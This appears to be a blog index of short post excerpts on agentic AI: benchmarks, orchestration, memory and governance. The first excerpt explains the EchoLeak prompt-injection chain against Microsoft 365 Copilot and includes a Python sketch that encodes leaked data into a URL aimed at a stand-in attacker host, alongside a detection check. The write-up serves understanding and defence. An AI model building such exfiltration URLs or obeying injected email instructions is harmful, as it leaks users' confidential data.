
Echoes Without Clicks: How EchoLeak Turned Copilot Into a Data Drip

Prompt injection just graduated from theory to incident response. EchoLeak (CVE‑2025‑32711) demonstrated a zero‑click exfiltration chain inside Microsoft 365 Copilot: a single crafted external email seeded hidden instructions; Copilot later pulled that message into context, encoded sensitive details into a URL, and the client auto‑fetched the link—leaking data without the user clicking anything. The final twist: a CSP‑allowed Teams proxy retrieved the attacker’s URL on Copilot’s behalf. Below I unpack why standard defenses failed, and what an enterprise‑ready fix looks like. ...
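The exfiltration primitive above can be sketched in a few lines. The attacker host and the defense heuristic below are illustrative assumptions, not the actual Copilot internals or Microsoft's fix:

```python
from urllib.parse import urlencode, urlparse, parse_qs

# The core EchoLeak trick: hidden instructions make the assistant render a
# "harmless" image/link whose URL carries context data in its query string.
ATTACKER_TEMPLATE = "https://attacker.example/pixel.png?{params}"  # hypothetical host

def build_exfil_url(leaked: dict) -> str:
    # Encode sensitive context fields into URL query parameters.
    return ATTACKER_TEMPLATE.format(params=urlencode(leaked))

# Coarse defense sketch (an assumption, not the shipped mitigation): treat any
# auto-fetched URL that carries query parameters as suspect before fetching.
def looks_like_exfil(url: str) -> bool:
    return bool(parse_qs(urlparse(url).query))

url = build_exfil_url({"subject": "Q3 forecast", "note": "board-only"})
assert looks_like_exfil(url)
assert not looks_like_exfil("https://example.com/logo.png")
```

The point of the sketch: the "click" never happens because the fetch is a side effect of rendering, which is why link-level user training did nothing here.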

September 20, 2025 · 5 min · Zelina

Org Charts for Robots: What AgentArch Really Tells Us About Enterprise AI

If you’ve ever tried turning a clever chatbot into a reliable employee, you already know the pain: great demos, shaky delivery. AgentArch, a new enterprise-focused benchmark from ServiceNow, is the first study I’ve seen that tests combinations of agent design choices—single vs multi‑agent, ReAct vs function-calling, summary vs complete memory, and optional “thinking tools”—across two realistic workflows: a simple PTO process and a gnarly customer‑request router. The result is a cold shower for one‑size‑fits‑all playbooks—and a practical map for building systems that actually ship. ...

September 20, 2025 · 4 min · Zelina

Right Tool, Right Thought: Difficulty-Aware Orchestration for Agentic LLMs

The punchline: Static multi‑agent pipelines are expensive on easy questions and underpowered on hard ones. DAAO (Difficulty‑Aware Agentic Orchestration) proposes a controller that first estimates the difficulty of each query, then composes a workflow from operators like CoT, ReAct, Multi‑Agent Debate, and Review/Ensemble, and finally routes each operator to the most suitable model in a heterogeneous LLM pool. The result: higher accuracy and lower cost across benchmark suites.

Why this matters (business lens): Spend less on routine queries—easy tickets don’t need five agents and GPT‑Ultra; DAAO keeps them shallow and cheap. Don’t whiff on the edge cases—when the question is gnarly, DAAO deepens the DAG and upgrades the models only where it pays. Procurement leverage: mixing open‑weights (Llama/Qwen) with commercial APIs lets you arbitrage price–performance per step.

What DAAO actually does: DAAO makes three tightly coupled decisions per query: ...
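The estimate-compose-route loop can be sketched minimally. The heuristics, tier thresholds, and model names below are my assumptions for illustration, not DAAO's learned components:

```python
# Hypothetical price/capability tiers standing in for a heterogeneous LLM pool.
MODEL_POOL = {
    "small-open":   {"cost": 1,  "skill": 1},
    "mid-open":     {"cost": 3,  "skill": 2},
    "frontier-api": {"cost": 10, "skill": 3},
}

def estimate_difficulty(query: str) -> float:
    # Placeholder heuristic; DAAO learns a difficulty estimator from queries.
    return min(len(query.split()) / 50, 1.0)

def compose_workflow(difficulty: float) -> list[str]:
    # Shallow workflows for easy queries; deepen the DAG only when it pays.
    if difficulty < 0.3:
        return ["CoT"]
    if difficulty < 0.7:
        return ["ReAct", "Review"]
    return ["ReAct", "Debate", "Ensemble"]

def route(operators: list[str], difficulty: float) -> list[tuple[str, str]]:
    # Map each operator to the cheapest model that clears the skill bar.
    need = 1 + int(difficulty * 2)
    tier = min((m for m, s in MODEL_POOL.items() if s["skill"] >= need),
               key=lambda m: MODEL_POOL[m]["cost"])
    return [(op, tier) for op in operators]

d = estimate_difficulty("What is 2 + 2?")
assert route(compose_workflow(d), d) == [("CoT", "small-open")]
```

The design point the sketch captures: difficulty gates both the workflow shape and the per-operator model choice, so cost scales with the query rather than with the worst case.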

September 20, 2025 · 4 min · Zelina

Fork, Fuse, and Rule: XAgents’ Multipolar Playbook for Safer Multi‑Agent AI

TL;DR: XAgents pairs a multipolar task graph (diverge with SIMO, converge with MISO) with IF‑THEN rule guards to plan uncertain tasks and suppress hallucinations. In benchmarks spanning knowledge and logic QA, it outperforms SPP, AutoAgents, TDAG, and AgentNet while using ~29% fewer tokens and ~45% less memory than AgentNet on a representative task. For operators, the practical win is a recipe to encode SOPs as rules on top of agent teams—without giving up adaptability. ...

September 19, 2025 · 4 min · Zelina

From DAGs to Swarms: The Quiet Revolution of Agentic Workflows

TL;DR: Traditional workflow managers treat science as a frozen DAG; the agentic era treats it as a living state machine that learns, optimizes, and—at scale—swarms. The payoff isn’t just speed: it’s a shift from execution pipelines to discovery loops, where hypotheses are generated, tested, and replanned continuously across labs, clouds, and HPC.

Why this matters (beyond the lab): Enterprises keep wiring LLMs into point solutions and calling it “automation.” Science, under stricter constraints (traceability, causality, irreversibility), is sketching a federated architecture where reasoning agents, facilities, and data fabrics negotiate in real time. If it works in a beamline, it’ll work in your back office. The blueprint is a reusable pattern for any AI-powered operation that must be auditable, distributed, and adaptive. ...

September 19, 2025 · 5 min · Zelina

Sandboxes & Ladders: How to Build a Steerable Agent Economy

If AI agents become the economy’s new workforce, what keeps their markets from melting into ours like solder—fast, hot, and hard to undo? DeepMind’s “Virtual Agent Economies” proposes a practical map (and a modest constitution) for that future: treat agent markets as sandboxes and tune their permeability to the human economy. Once you see permeability as the policy lever, the rest of the architecture falls into place: auctions to resolve clashes, mission-led markets to direct effort, and identity rails so agents can be trusted, priced, and sanctioned. ...

September 19, 2025 · 6 min · Zelina

Terms of Engagement: Building Trustworthy AI Agents Before They Build Us

As agentic AI moves from flashy demos to day‑to‑day operations—handling renewals, filing tickets, triaging inboxes, even buying things—the question is no longer can we automate judgment, but on what terms. This isn’t ethics-as-window‑dressing: agent systems perceive, decide, and act through real interfaces (email, bank APIs, code repos), and they can help—or hurt—at machine speed. Today I’ll argue three things: (1) alignment must shift from “answer quality” to action quality; (2) social agents change the duty of care developers and companies owe to users; (3) we need a governance stack for multi‑agent ecosystems, not one‑off checklists. The discussion is grounded in the Nature piece by Gabriel, Keeling, Manzini, and Evans (2025), but tuned for operators shipping products this quarter—not a hypothetical future. ...

September 19, 2025 · 5 min · Zelina

Tool Wars, Protocol Peace: What MCP‑AgentBench Really Measures

TL;DR: MCP‑AgentBench is the first broad benchmark that evaluates language agents inside the Model Context Protocol (MCP) rather than with ad‑hoc function calls. It sets up 33 MCP servers with 188 tools and runs 600 goal‑oriented queries across six task patterns. Results flip a few assumptions: open‑source leaders (notably Qwen3‑235B‑A22B) can top the table under the ReAct style, while Claude 4 Sonnet shines with native tool‑calling. Token budgets matter: o3‑mini posts the best performance‑per‑token among big names. The meta‑lesson for builders: your agent’s interaction style must match the model, and benchmarks must reward outcome, not ritual. ...

September 19, 2025 · 5 min · Zelina

Branching Out of the Box: Tree‑OPO Turns MCTS Traces into Better RL for Reasoning

The punchline: Tree‑OPO takes something many labs already produce—MCTS rollouts from a stronger teacher—and treats them not just as answers but as a curriculum of prefixes. It then optimizes a student with GRPO-like updates, but with staged, tree-aware advantages instead of a flat group mean. The result in math reasoning (GSM8K) is a modest but consistent bump over standard GRPO while keeping memory/complexity low. Why this matters for practitioners: you can get more out of your expensive searches (or teacher traces) without training a value model or lugging around teacher logits during student training. ...
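The difference between a flat group-mean baseline and a staged, prefix-aware one can be sketched with toy rewards (illustrative formulas, not the paper's exact estimator):

```python
from collections import defaultdict
from statistics import mean

# (prefix_id, reward) pairs harvested from teacher MCTS rollouts.
rollouts = [
    ("root", 1.0), ("root", 0.0),
    ("root/a", 1.0), ("root/a", 1.0), ("root/a", 0.0),
]

def flat_advantages(rollouts):
    # Standard GRPO-style baseline: one group mean over every rollout.
    mu = mean(r for _, r in rollouts)
    return [r - mu for _, r in rollouts]

def staged_advantages(rollouts):
    # Tree-aware baseline: each completion is compared only against
    # siblings that share its prefix (its stage in the search tree).
    by_prefix = defaultdict(list)
    for p, r in rollouts:
        by_prefix[p].append(r)
    return [r - mean(by_prefix[p]) for p, r in rollouts]

print(flat_advantages(rollouts))
print(staged_advantages(rollouts))
```

Note how a reward of 1.0 under the deep prefix `root/a` earns a smaller advantage than the same reward at `root`: succeeding from an easier starting point is credited less, which is the curriculum signal flat averaging throws away.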

September 17, 2025 · 5 min · Zelina

Memory That Fights Back: How SEDM Turns Agent Logs into Verified Knowledge

TL;DR: Most “agent memory” is a junk drawer: it grows fast, gets noisy, and slows everything down. SEDM (Self‑Evolving Distributed Memory) proposes an auditable, efficiency‑first overhaul. It verifies each candidate memory by replaying the exact run in a Self‑Contained Execution Context (SCEC), assigns an initial utility‑aligned weight, and then self‑schedules what to retrieve next. The result: higher task accuracy with fewer tokens versus strong memory baselines on FEVER and HotpotQA. ...
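The verify-then-admit flow can be sketched as follows; all names and the replay stand-in are assumptions for illustration, not SEDM's actual SCEC machinery:

```python
from dataclasses import dataclass

@dataclass
class Memory:
    content: str
    weight: float = 0.0

def replay(run_inputs, expected_output, executor) -> bool:
    # SCEC stand-in: deterministically re-execute from pinned inputs and
    # check that the recorded outcome reproduces.
    return executor(run_inputs) == expected_output

def admit(store, cand: Memory, run_inputs, expected, executor,
          utility_delta: float) -> bool:
    if not replay(run_inputs, expected, executor):
        return False  # unverifiable candidates never enter the store
    # Initial weight tracks the measured utility the memory contributed.
    cand.weight = max(utility_delta, 0.0)
    store.append(cand)
    return True

store = []
ok = admit(store, Memory("FEVER: claim X refuted by doc D"),
           run_inputs={"claim": "X"}, expected="REFUTES",
           executor=lambda inp: "REFUTES", utility_delta=0.2)
assert ok and store[0].weight == 0.2
```

The junk-drawer failure mode disappears by construction here: nothing enters the store without a reproducible run behind it, and retrieval can rank by the utility-seeded weights instead of recency.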

September 17, 2025 · 5 min · Zelina